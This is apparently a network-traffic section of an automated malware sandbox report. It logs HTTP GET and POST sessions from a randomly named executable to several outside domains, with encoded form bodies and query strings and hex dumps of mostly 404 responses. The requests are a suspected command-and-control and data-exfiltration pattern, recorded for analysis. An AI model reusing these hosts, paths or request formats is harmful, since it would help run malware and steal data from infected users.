                                                                Data Raw: 55 66 6a 78 75 44 50 3d 59 4a 58 62 39 38 44 56 57 36 78 31 6d 50 62 67 56 50 31 4e 36 34 31 37 41 42 54 7a 59 51 61 53 34 73 2b 71 63 77 36 7a 71 71 35 32 4b 55 58 30 74 36 7a 4f 64 76 77 7a 6f 37 41 58 6f 4b 61 7a 39 64 65 51 63 4d 63 6d 6f 2b 55 65 71 62 74 78 43 56 35 45 6c 77 35 57 6c 61 38 30 41 41 6f 50 49 36 62 4c 32 34 30 4f 45 53 35 65 58 30 77 74 59 4c 61 35 2b 31 56 4e 67 4d 66 54 6d 51 68 43 32 34 42 33 4a 4e 43 35 4a 6d 79 68 38 63 62 2b 31 44 69 5a 32 65 4e 7a 52 7a 75 2f 77 49 34 68 6e 41 52 68 47 69 73 59 79 38 30 7a 48 4a 79 43 6e 5a 6c 56 6f 54 66 6f 53 6b 52 74 61 66 4b 39 4a 55 38 36 44 37 55 64 76 4b 48 5a 2f 70 4c 73 6a 46 52 53 78 7a 53 54 69 6a 71 33 4e 62 33 39 68 71 4c 4e 2b 62 6e 74 32 6f 7a 63 35 6a 4c 2b 4c 55 50 4e 44 72 4e 76 6d 64 78 61 4a 65 54 67 70 73 37 52 47 58 68 58 2f 67 45 4f 54 2f 4d 58 59 49 4d 61 49 6f 2b 4e 4d 6f 34 46 31 7a 62 2b 49 4b 51 45 6a 46 38 38 4d 38 44 55 34 7a 76 67 64 58 57 62 45 73 73 2f 6e 5a 4f 4b 76 62 34 33 42 74 4f 63 30 4c 52 76 2f 32 [TRUNCATED]
                                                                Data Ascii: UfjxuDP=YJXb98DVW6x1mPbgVP1N6417ABTzYQaS4s+qcw6zqq52KUX0t6zOdvwzo7AXoKaz9deQcMcmo+UeqbtxCV5Elw5Wla80AAoPI6bL240OES5eX0wtYLa5+1VNgMfTmQhC24B3JNC5Jmyh8cb+1DiZ2eNzRzu/wI4hnARhGisYy80zHJyCnZlVoTfoSkRtafK9JU86D7UdvKHZ/pLsjFRSxzSTijq3Nb39hqLN+bnt2ozc5jL+LUPNDrNvmdxaJeTgps7RGXhX/gEOT/MXYIMaIo+NMo4F1zb+IKQEjF88M8DU4zvgdXWbEss/nZOKvb43BtOc0LRv/292wOsX9nIgYURyTIJbOlDbpBMViXYHw4CQaAqdnVcg3CL7SS0VgUH2pVU9E6iO6Jxb5hYu764Nx8QytBZ3+NfSzLCog/PerOsACByHPfGxnw1jOLe2RBTbUDebIoX/NvgzLxVAqIz86V+o4aD5lynXis1Iy5WRqaw4ikUJcTZmj2V+GaGXHP3U8/xu0QdefaHCgAqAhYwBLKN1EggTgHo9FsPhYGV80H/Do20yHhqeZd/+pjNwx7ISUN/S7PPs/Am3Cbn/4t5nVQiI9HLbAD6dBEbBFolubQIZ4EnzdkdsYIlDnkdS6V3kGGPmRCysqoGyjKpF7qGhhoUc6BseFrYeIr6/qisHPH4QNOWjcvXYuUmZTIgBAiIOx9bqGz/hTpyx04YkwDDX+43aEbhYfnxZyhOesJaSqSiLoOJNC7mTgWtKsANRLugXqjYkWOCPNX/9pHeEoouwNNW35cAZepgcR8IbT19sep9G2i1zM28A3MtgjjzmneZMzCuLPO8Q6fJ2iNjdt8BGgkcWjTQ/WE+ihYeErj/1OmbTyvhqtT1pH40BSnU0Bmw81nhahOB/xmdabEZZr//Lt2APzfqWdaHZxfHBQnKsNO54vau49WRncY9ky1xPpLAgVAwxmUZJDhkeoxfocuHmhbqzkpQxYSDDb2zQCOamjWEm [TRUNCATED]
                                                                Jan 11, 2025 09:15:41.881556034 CET533INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:41 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.74998169.57.163.64803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:43.839692116 CET492OUTGET /zbqa/?UfjxuDP=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA9RQKtvF2RwQZX7jt+LR0GxdMQnQscMzB9kd5j+7KhxpY8qBrHtH6UUu4&LRJdx=qxGHfdRH_npdPLS HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                Host: www.showyourstyle.top
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Jan 11, 2025 09:15:44.449965954 CET548INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:44 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.749982101.32.205.61803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:49.711334944 CET741OUTPOST /gtil/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 220
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rwse6wjx.sbs
                                                                Origin: http://www.rwse6wjx.sbs
                                                                Referer: http://www.rwse6wjx.sbs/gtil/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 2f 77 42 62 77 32 38 72 69 33 77 72 45 62 48 37 6d 30 31 74 36 36 6b 77 6e 59 50 59 46 33 48 39 6c 37 61 35 72 5a 76 47 6c 68 36 2f 6a 54 69 70 4d 47 78 35 6f 6a 7a 52 74 54 49 5a 53 49 37 31 45 58 4b 75 67 30 46 51 42 52 73 64 57 57 6a 74 67 67 67 65 6b 30 77 79 72 73 75 59 57 2f 48 39 47 56 52 6a 79 61 69 2b 77 45 51 6f 61 70 46 46 4d 2b 62 6d 6d 38 6b 53 49 61 6a 61 6a 67 56 50 30 30 79 7a 50 56 52 6f 35 4c 6d 4a 76 52 76 58 30 63 6b 64 2b 48 5a 44 41 68 55 54 77 66 48 73 64 77 4c 2b 76 4a 69 4b 65 69 73 50 41 59 6e 48 36 62 35 6c 58 6b 66 4d 33 2f 6f 52 42 59 71 68 46 75 4e 54 54 6d 4b 42 7a 42 39 4f 55 79 67 62 5a 51 3d 3d
                                                                Data Ascii: UfjxuDP=/wBbw28ri3wrEbH7m01t66kwnYPYF3H9l7a5rZvGlh6/jTipMGx5ojzRtTIZSI71EXKug0FQBRsdWWjtgggek0wyrsuYW/H9GVRjyai+wEQoapFFM+bmm8kSIajajgVP00yzPVRo5LmJvRvX0ckd+HZDAhUTwfHsdwL+vJiKeisPAYnH6b5lXkfM3/oRBYqhFuNTTmKBzB9OUygbZQ==
                                                                Jan 11, 2025 09:15:50.716609001 CET306INHTTP/1.1 404 Not Found
                                                                Server: Tengine
                                                                Date: Sat, 11 Jan 2025 08:15:50 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.749983101.32.205.61803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:52.269630909 CET761OUTPOST /gtil/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 240
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rwse6wjx.sbs
                                                                Origin: http://www.rwse6wjx.sbs
                                                                Referer: http://www.rwse6wjx.sbs/gtil/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 2f 77 42 62 77 32 38 72 69 33 77 72 45 37 33 37 67 58 64 74 7a 36 6b 76 6f 34 50 59 50 58 48 35 6c 37 47 35 72 59 72 6f 6c 54 65 2f 6a 79 53 70 50 46 70 35 70 6a 7a 52 31 44 49 63 64 6f 37 38 45 58 33 54 67 31 70 51 42 52 34 64 57 55 37 74 67 54 49 5a 2b 45 77 30 6d 4d 75 65 62 66 48 39 47 56 52 6a 79 61 48 5a 77 48 67 6f 61 59 31 46 4e 62 6e 6c 76 63 6b 52 50 61 6a 61 31 51 56 4c 30 30 79 72 50 55 64 47 35 4a 75 4a 76 51 66 58 30 4e 6b 65 30 48 5a 46 4e 42 56 34 32 2b 6d 49 58 43 43 4e 75 61 69 51 61 31 67 6f 4d 4f 6d 6c 67 35 31 4a 4a 31 6e 33 7a 39 4d 6e 57 2b 33 55 48 76 4a 4c 65 45 2b 67 73 32 59 6b 5a 67 42 66 50 6f 6d 73 4b 6a 30 46 61 69 71 6d 4b 6a 69 4a 67 44 51 61 7a 47 4d 3d
                                                                Data Ascii: UfjxuDP=/wBbw28ri3wrE737gXdtz6kvo4PYPXH5l7G5rYrolTe/jySpPFp5pjzR1DIcdo78EX3Tg1pQBR4dWU7tgTIZ+Ew0mMuebfH9GVRjyaHZwHgoaY1FNbnlvckRPaja1QVL00yrPUdG5JuJvQfX0Nke0HZFNBV42+mIXCCNuaiQa1goMOmlg51JJ1n3z9MnW+3UHvJLeE+gs2YkZgBfPomsKj0FaiqmKjiJgDQazGM=
                                                                Jan 11, 2025 09:15:53.501966000 CET306INHTTP/1.1 404 Not Found
                                                                Server: Tengine
                                                                Date: Sat, 11 Jan 2025 08:15:53 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.749984101.32.205.61803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:54.844646931 CET1774OUTPOST /gtil/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 1252
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rwse6wjx.sbs
                                                                Origin: http://www.rwse6wjx.sbs
                                                                Referer: http://www.rwse6wjx.sbs/gtil/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 2f 77 42 62 77 32 38 72 69 33 77 72 45 37 33 37 67 58 64 74 7a 36 6b 76 6f 34 50 59 50 58 48 35 6c 37 47 35 72 59 72 6f 6c 54 57 2f 69 41 61 70 50 6b 70 35 76 54 7a 52 38 6a 49 64 64 6f 36 38 45 54 6a 58 67 31 56 75 42 54 41 64 58 31 62 74 33 53 49 5a 72 55 77 30 76 73 75 66 57 2f 47 39 47 56 42 6e 79 61 58 5a 77 48 67 6f 61 61 74 46 62 2b 62 6c 70 63 6b 53 49 61 6a 47 6a 67 56 7a 30 31 61 37 50 55 4a 34 34 34 4f 4a 76 77 50 58 31 2f 4d 65 70 33 5a 48 4f 42 56 67 32 2b 71 58 58 43 66 32 75 5a 2b 32 61 79 73 6f 4f 6f 4b 2b 31 62 78 4a 52 57 2f 66 31 4d 41 47 47 74 48 34 4a 65 4e 43 66 47 53 73 67 55 55 44 59 43 31 72 43 2b 37 55 56 42 4d 4a 58 67 4b 4c 47 6a 50 79 6b 52 77 53 6e 44 34 41 42 75 67 68 5a 41 6f 77 74 63 36 46 4d 2b 51 4c 45 35 68 39 42 4a 4e 4b 35 4a 52 59 32 75 7a 42 58 7a 74 67 6a 54 39 6d 46 76 68 48 54 48 6c 62 6b 4f 48 6b 73 31 46 51 58 4b 58 33 6f 78 66 71 2f 74 2f 33 75 4d 49 49 38 5a 39 74 62 45 48 74 63 38 44 79 46 50 54 7a 47 49 56 6d 6f 52 74 67 6c 53 [TRUNCATED]
                                                                Data Ascii: UfjxuDP=/wBbw28ri3wrE737gXdtz6kvo4PYPXH5l7G5rYrolTW/iAapPkp5vTzR8jIddo68ETjXg1VuBTAdX1bt3SIZrUw0vsufW/G9GVBnyaXZwHgoaatFb+blpckSIajGjgVz01a7PUJ444OJvwPX1/Mep3ZHOBVg2+qXXCf2uZ+2aysoOoK+1bxJRW/f1MAGGtH4JeNCfGSsgUUDYC1rC+7UVBMJXgKLGjPykRwSnD4ABughZAowtc6FM+QLE5h9BJNK5JRY2uzBXztgjT9mFvhHTHlbkOHks1FQXKX3oxfq/t/3uMII8Z9tbEHtc8DyFPTzGIVmoRtglSmNuGF70NJVCgJ9LYbNF7T5Umm2mjPGpeQ/TXQuQzwNINMRQfUkZOMkDpg8+uomzH51I7XD4MGi2hPHG4ILtBkW8FdJQY8aEO2eBjSSsIPajbaL3gKES+PgQdtapJYFcGC9z+lX6hzqqPBWDWKk4alD1p4lofz7ATZHMjpmuhzedYl9QPArdjDI+iT9A4p9Y+4mpB3tTESFp9k3jtZxeBSHhpJ9TAyFgSzQADHYyx7LPbUSF9QkC+cX0uJ0/16RYdoZBtqOnBFNbDt+ai/vXo9+zxCAvl/VGDk7xqYXQEuBWbs4zZNeeVkYMG1/XyALs0mVIeE4V6FfmCRfCjyHoTztJgMnhHyWaeCVR991pYuPEpeoA09/XEIrscrj9nrjPjxTDiASoUOpygg5fzvPKlXVt28jKsTCezce42LTup4O3I42mLTwEwVOvbYdt9GXcODpV54MIsCFrIKPSb8OZr23r0JdY1L2RnDjzkxDTlEcaWiuCRpCB8peSGkRs84Mo7DMOw8M0y+Dhm6uLkMTC3fvOy2wicCR4Vy6nIcn2pTLaiYaX/n34tgdQow5z5ujQSHwCqMnRzeW5xhmRBkJlFPIaQAoZOHRAwn9boK5dwGvZdXQ3ucJS/bC/8cWEF+wt/eNAgX3x/7gDIbG0HK1uQVYGJ5yd1JtZOv7 [TRUNCATED]
                                                                Jan 11, 2025 09:15:55.731194973 CET306INHTTP/1.1 404 Not Found
                                                                Server: Tengine
                                                                Date: Sat, 11 Jan 2025 08:15:55 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.749985101.32.205.61803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:57.388386011 CET487OUTGET /gtil/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/+0E8p+6jedrKHm5NubPBlXEWe4lmKrOCn9YHOrHb1DBA91+ELFM00oq5 HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                Host: www.rwse6wjx.sbs
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Jan 11, 2025 09:15:58.282186031 CET306INHTTP/1.1 404 Not Found
                                                                Server: Tengine
                                                                Date: Sat, 11 Jan 2025 08:15:58 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.749986103.159.36.66803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:16:03.968719006 CET759OUTPOST /nfd2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 220
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rokeyfashion.store
                                                                Origin: http://www.rokeyfashion.store
                                                                Referer: http://www.rokeyfashion.store/nfd2/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 41 78 51 79 53 73 53 59 66 4f 44 57 70 71 4c 53 44 6c 51 4d 64 36 72 74 52 77 74 7a 53 68 58 69 33 2f 68 73 65 5a 7a 2b 7a 6d 47 2b 6d 55 4e 53 43 4d 4f 64 70 72 4e 49 74 79 4e 6c 63 59 4c 78 65 4c 56 6d 53 65 44 39 45 6d 35 6c 57 43 36 56 72 6e 6c 5a 66 71 63 55 69 35 67 48 4e 50 44 58 6a 50 70 4d 79 43 6c 68 67 42 76 35 4e 38 33 6c 43 50 63 62 45 45 6f 31 75 50 71 72 77 6d 4b 6b 6f 77 76 32 70 51 32 2f 6d 68 41 7a 48 72 6d 53 39 43 35 46 74 54 46 4b 31 33 67 31 2b 54 47 66 53 51 53 74 6f 56 53 69 6d 38 56 44 4e 75 49 51 41 31 66 46 59 49 55 2f 45 58 62 32 70 54 71 53 2b 46 76 30 74 61 48 5a 44 6f 51 66 62 49 52 31 4c 41 3d 3d
                                                                Data Ascii: UfjxuDP=AxQySsSYfODWpqLSDlQMd6rtRwtzShXi3/hseZz+zmG+mUNSCMOdprNItyNlcYLxeLVmSeD9Em5lWC6VrnlZfqcUi5gHNPDXjPpMyClhgBv5N83lCPcbEEo1uPqrwmKkowv2pQ2/mhAzHrmS9C5FtTFK13g1+TGfSQStoVSim8VDNuIQA1fFYIU/EXb2pTqS+Fv0taHZDoQfbIR1LA==
                                                                Jan 11, 2025 09:16:05.145494938 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-litespeed-tag: 2ea_HTTP.404
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                content-type: text/html; charset=UTF-8
                                                                link: <https://rokeyfashion.store/wp-json/>; rel="https://api.w.org/"
                                                                x-litespeed-cache-control: no-cache
                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                transfer-encoding: chunked
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 08:16:04 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 35 30 39 30 0d 0a 94 96 17 66 22 ec 3a a9 fd 87 44 54 d5 7e 58 91 81 6b d6 0f 01 aa 33 31 c6 0d fd f1 eb cf bf bf 08 8c 9b f8 58 e7 f9 fe df 5f 6a ff ed fc 7c dd e8 9d 1a e8 48 32 e0 1d 97 74 d6 ed a4 d3 be 25 ce 63 64 74 b1 95 08 89 91 84 b1 87 f1 65 cb aa 77 f7 e7 95 31 ec 61 d5 a4 dc ca d4 01 c8 73 1c e7 6b 4f 81 84 21 0a 03 2b a0 ca 5e 87 ff f6 be 56 ff 9d fc 7c b1 6c 69 33 b5 1b 61 38 08 21 a5 63 6f 39 ce 64 3b f3 4c 3f f7 79 af 0b c1 91 4d b7 24 34 80 ec 78 1e f7 b6 f6 75 3b 71 9c f7 18 66 3f 0a 42 44 16 f9 04 b5 f5 56 40 35 d4 37 8b 5d 49 74 f0 e7 f7 a6 9f 7c 4b 67 0b 77 01 da 4d 82 5a d7 4a 3f a8 a3 84 55 98 7c b6 e8 9c 73 2f 78 53 c0 a8 80 51 01 a3 02 24 2b 65 64 09 d4 73 cf 2d ef cd 9b 91 3c 2a 6e b2 57 2b e9 37 97 2d 92 dc 1a 90 bf 17 c8 4e d3 ff a9 0d 06 06 cb 8e b6 94 86 52 08 9e f4 71 d0 26 68 43 58 00 80 01 30 ff b7 ac 14 4a 4e 19 09 1b d1 52 de 67 14 32 33 b5 01 fd bf aa de f3 4c cf 80 d9 00 66 57 69 56 b7 40 ca b3 77 27 e5 5f d5 61 7e f7 8c 74 d5 33 0a dd 7b 0e bd a7 d4 eb d8 0a 29 [TRUNCATED]
                                                                Data Ascii: 5090f":DT~Xk31X_j|H2t%cdtew1askO!+^V|li3a8!co9d;L?yM$4xu;qf?BDV@57]It|KgwMZJ?U|s/xSQ$+eds-<*nW+7-NRq&hCX0JNRg23LfWiV@w'_a~t3{)Ei@,@X?iv%0}fIDDQ1]Kn"?tkU&>;V^ua?q08>1$+@1KFQ(0$k`>zWS8"VDQDHA}j|PP>~o%}3&Q9O(NjX<MO]rw\|qLl'e>wZWpH~P]DL}kc3gb5n-f&&y=[DYo6kp|eM(5',x;?d5tCPN3nqf~V[/~-y:P@rJ
